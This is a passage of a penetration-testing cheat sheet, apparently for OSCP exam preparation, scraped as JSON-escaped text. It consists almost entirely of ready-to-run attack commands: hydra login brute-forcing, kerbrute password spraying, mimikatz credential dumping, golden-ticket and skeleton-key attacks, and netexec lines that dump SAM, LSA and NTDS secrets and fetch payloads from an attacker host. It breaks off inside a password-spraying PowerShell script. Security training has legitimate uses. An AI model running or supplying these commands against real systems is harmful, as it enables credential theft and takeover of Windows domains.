Invalid\"\nhydra \u003cRHOST\u003e -L /PATH/TO/WORDLIST/\u003cFILE\u003e -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/login:usernameField=^USER^\u0026passwordField=^PASS^:unsuccessfulMessage\" -s \u003cRPORT\u003e\nhydra \u003cRHOST\u003e -l root@localhost -P otrs-cewl.txt http-form-post \"/otrs/index.pl:Action=Login\u0026RequestedURL=Action=Admin\u0026User=root@localhost\u0026Password=^PASS^:Login failed\" -vV -f\nhydra \u003cRHOST\u003e -l admin -P /PATH/TO/WORDLIST/\u003cFILE\u003e http-post-form \"/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1\u0026__EVENTVALIDATION=COOKIE_2\u0026UserName=^USER^\u0026Password=^PASS^\u0026LoginButton=Log+in:Login failed\"\n```\n\n#### John\n\n```c\nkeepass2john \u003cFILE\u003e\nssh2john id_rsa \u003e \u003cFILE\u003e\nzip2john \u003cFILE\u003e \u003e \u003cFILE\u003e\njohn \u003cFILE\u003e --wordlist=/PATH/TO/WORDLIST/\u003cWORDLIST\u003e --format=crypt\njohn \u003cFILE\u003e --rules --wordlist=/PATH/TO/WORDLIST/\u003cWORDLIST\njohn --show \u003cFILE\u003e\n```\n\n#### Kerbrute\n\n##### User Enumeration\n\n```c\n./kerbrute userenum -d \u003cDOMAIN\u003e --dc \u003cDOMAIN\u003e /PATH/TO/FILE/\u003cUSERNAMES\u003e\n```\n\n##### Password Spray\n\n```c\n./kerbrute passwordspray -d \u003cDOMAIN\u003e --dc \u003cDOMAIN\u003e /PATH/TO/FILE/\u003cUSERNAMES\u003e \u003cPASSWORD\u003e\n```\n\n#### LaZagne\n\n```c\nlaZagne.exe all\n```\n\n#### mimikatz\n\n##### Common Commands\n\n```c\ntoken::elevate\ntoken::revert\nvault::cred\nvault::list\nlsadump::sam\nlsadump::secrets\nlsadump::cache\nlsadump::dcsync /\u003cUSERNAME\u003e:\u003cDOMAIN\u003e\\krbtgt /domain:\u003cDOMAIN\u003e\n```\n\n##### Dump Hashes\n\n```c\n.\\mimikatz.exe\nsekurlsa::minidump /users/admin/Desktop/lsass.DMP\nsekurlsa::LogonPasswords\nmeterpreter \u003e getprivs\nmeterpreter \u003e creds_all\nmeterpreter \u003e golden_ticket_create\n```\n\n##### Pass the Ticket\n\n```c\n.\\mimikatz.exe\nsekurlsa::tickets /export\nkerberos::ptt [0;76126]-2-0-40e10000-Administrator@krbtgt-\u003cRHOST\u003e.LOCAL.kirbi\nklist\ndir \\\\\u003cRHOST\u003e\\admin$\n```\n\n##### Forging Golden Ticket\n\n```c\n.\\mimikatz.exe\nprivilege::debug\nlsadump::lsa /inject /name:krbtgt\nkerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500\nmisc::cmd\nklist\ndir \\\\\u003cRHOST\u003e\\admin$\n```\n\n##### Skeleton Key\n\n```c\nprivilege::debug\nmisc::skeleton\nnet use C:\\\\\u003cRHOST\u003e\\admin$ /user:Administrator mimikatz\ndir \\\\\u003cRHOST\u003e\\c$ /user:\u003cUSERNAME\u003e mimikatz\n```\n\n#### NetExec\n\n```c\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus -o READ_ONLY=false\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true\nnetexec smb \u003cRHOST\u003e -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=true MAX_FILE_SIZE=99999999\nnetexec smb \u003cRHOST\u003e -u '' -p '' --share \u003cSHARE\u003e --get-file \u003cFILE\u003e \u003cFILE\u003e \nnetexec smb \u003cRHOST\u003e -u 'guest' -p '' --shares --rid-brute\nnetexec smb \u003cRHOST\u003e -u 'guest' -p '' --shares --rid-brute 100000\nnetexec smb \u003cRHOST\u003e -u 'guest' -p '' --shares --rid-brute | grep 'SidTypeUser' | awk '{print $6}' \nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' --use-kcache --users\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' --use-kcache --sam\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --shares\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --shares \u003cSHARE\u003e --dir\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --shares \u003cSHARE\u003e --dir \"FOLDER\"\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --sam\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --lsa\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --dpapi\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --local-auth --sam\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --local-auth --lsa\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --local-auth --dpapi\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M enum_av\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M wcc\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M snipped\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M lsassy\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M web_delivery -o URL=http://\u003cLHOST\u003e/\u003cFILE\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M gpp_autologin\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M gpp_password\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M powershell_history\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M coerce_plus -o LISTENER=\u003cLHOST\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --ntds\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -H '\u003cNTLMHASH\u003e' --ntds\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --ntds --user \u003cUSERNAME\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -H '\u003cNTLMHASH\u003e' --ntds --user \u003cUSERNAME\u003e\nnetexec smb \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -H '\u003cHASH\u003e' -x \"whoami\"\nnetexec smb /PATH/TO/FILE/\u003cFILE\u003e --gen-relay-list \u003cFILE\u003e\nnetexec ldap \u003cRHOST\u003e -u '' -p '' --asreproast\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M -user-desc\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M get-desc-users\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M ldap-checker\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M veeam\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M maq\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M adcs\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M zerologon\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M petitpotam\nnetexec ldap \u003cRHOST\u003e -u '' -p '' -M nopac\nnetexec ldap \u003cRHOST\u003e -u '' -p '' --use-kcache -M whoami\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa -k\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa-convert-id \u003cID\u003e\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --gmsa-decrypt-lsa \u003cACCOUNT\u003e\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -M get-network -o ALL=true\nnetexec ldap \u003cRHOST\u003e -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' --bloodhound -ns \u003cRHOST\u003e -c all\nnetexec winrm \u003cSUBNET\u003e/24 -u '\u003cUSERNAME\u003e' -p '\u003cPASSWORD\u003e' -d .\nnetexec winrm -u /t -p '\u003cPASSWORD\u003e' -d '\u003cDOMAIN\u003e' \u003cRHOST\u003e\nnetexec winrm \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e\nnetexec winrm \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --ignore-pw-decoding\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --no-bruteforce --continue-on-success\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --shares\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --shares --continue\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --pass-pol\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --lusers\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --sam\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e --wdigest enable\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e -x 'quser'\nnetexec \u003cPROTOCOL\u003e \u003cRHOST\u003e -u /PATH/TO/FILE/\u003cUSERNAMES\u003e -p /PATH/TO/WORDLIST/\u003cWORDLIST\u003e -x 'net user Administrator /domain' --exec-method smbexec\n```\n\n#### pypykatz\n\n```c\npypykatz lsa minidump lsass.dmp\npypykatz registry --sam sam system\n```\n\n#### Spray-Passwords\n\n##### Spray-Passwords.ps1\n\n```powershell\n\u003c#\n .SYNOPSIS\n PoC PowerShell script to demo how to perform password spraying attacks against \n user accounts in Active Directory (AD), aka low and slow online brute force method.\n Only use for good and after written approval from AD owner.\n Requires access to a Windows host on the internal network, which may perform\n queries against the Primary Domain Controller (PDC).\n Does not require admin access, neither in AD or on Windows host.\n Remote Server Administration Tools (RSAT) are not required.\n \n Should NOT be considered OPSEC safe since:\n - a lot of traffic is generated between the host and the Domain Controller(s).\n - failed logon events will be massive on Domain Controller(s).\n - badpwdcount will iterate on user account objects in scope.\n \n No accounts should be locked out by this script alone, but there are no guarantees.\n NB! This script does not take Fine-Grained Password Policies (FGPP) into consideration.\n .DESCRIPTION\n Perform password spraying attack against user accounts in Active Directory.\n .PARAMETER Pass\n Specify a single or multiple passwords to test for each targeted user account. Eg. -Pass 'Password1,Password2'. Do not use together with File or Url.\"\n\t\n .PARAMETER File\n Supply a path to a password input file to test multiple passwords for each targeted user account. Do not use together with Pass or Url.\n\t\n .PARAMETER Url\n Download file from given URL and use as password input file to test multiple passwords for each targeted user account. Do not use together with File o","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xsyr0%2FOSCP","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F0xsyr0%2FOSCP","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F0xsyr0%2FOSCP/lists"}